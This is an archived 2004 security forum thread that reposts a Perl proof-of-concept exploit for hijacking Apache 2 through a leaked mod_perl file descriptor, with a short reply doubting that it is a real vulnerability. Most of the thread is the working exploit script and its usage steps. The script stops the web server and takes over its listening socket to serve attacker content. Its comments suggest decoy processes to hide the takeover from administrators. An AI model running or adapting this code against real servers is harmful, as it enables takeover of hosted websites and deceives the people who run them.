hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
GaLiaRePt
Jan 22 2004, 10:07 PM
Apache 2 Daemon HiJacking via mod_perl File Descriptor Leak Exploit

Date: 2004-01-22
Author : Steve Grubb <linux_4ever@yahoo.com>
Download : http://www.security-corporation.com/downlo..._perl-sploit.pl

CODE
#!/usr/bin/perl
###############################################################################
#
#Hijacking Apache 2 via mod_perl
#
#The technique is simple.
#
#1) Fork and daemonize yourself.
#2) Do something evil to apache.
#2) Select on the leaked descriptor and start serving pages.
#
#At the end of this advisory is a proof-of-concept program that you can run under mod_perl. It is assumed
#that paying customers can ftp anything they want into their website and mod_perl scripting is enabled.
#
#cp mod_perl-sploit.pl /var/www/perl
#
#lynx http://localhost/perl/mod_perl-sploit.pl
#
#Now, ps -ef to see how things are going:
#
#apache 3107 2652 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
#apache 3108 2640 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
#
#So far, so good...
#
#lynx http://localhost
#
#And you should see the "You're owned" message. The really sneaky part is that 'ps -ef'
#gives only a minor hint that apache has been replaced. The only way to tell something is
#abnormal is that there's only 2 apache instances when a normal Mandrake server in its
#default configuration shows 5 instances. But, forking off a few decoy children should
#be easy enough to do.
#
#This was tested on a fully updated Mandrake 9.2 system.
#
###############################################################################

use POSIX qw(setsid);
                                                                               
if (!defined(my $pid = fork)) {
       print "Content-Type: text/html\n\n";
       print "cannot fork: $!";
       exit 1;
} elsif ($pid) { # This is the parent
       sleep(1);
       print "Content-Type: text/html\n\n";
       print "<html><body>Exploit installed</body></html>";
       system '/usr/sbin/httpd2 -k stop';
       sleep(2);
       exit 0;
}
                                                                               
# This is the Child
setsid;
sleep(2);
my $leak = 4;
open(Server, "+<&$leak");
while (1) {
       my $rin = '';
       vec($rin,fileno(Server),1) = 1;
       $nfound = select($rout = $rin, undef, undef, undef);
       if (accept(Client,Server) ) {
               print Client "HTTP/1.0 200 OK\n";
               print Client "Content-Length: 40\n";
               print Client "Content-Type: text/html\n\n";
               print Client "<html><body>";
               print Client "You're owned.";
               print Client "</body></html>";
               close Client;
       }
}


ph34r.gif
JeiAr
Jan 22 2004, 10:53 PM
If you read the discussion about this on BugTraq you will see that it really isn't a vuln at all.

Best Regards
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.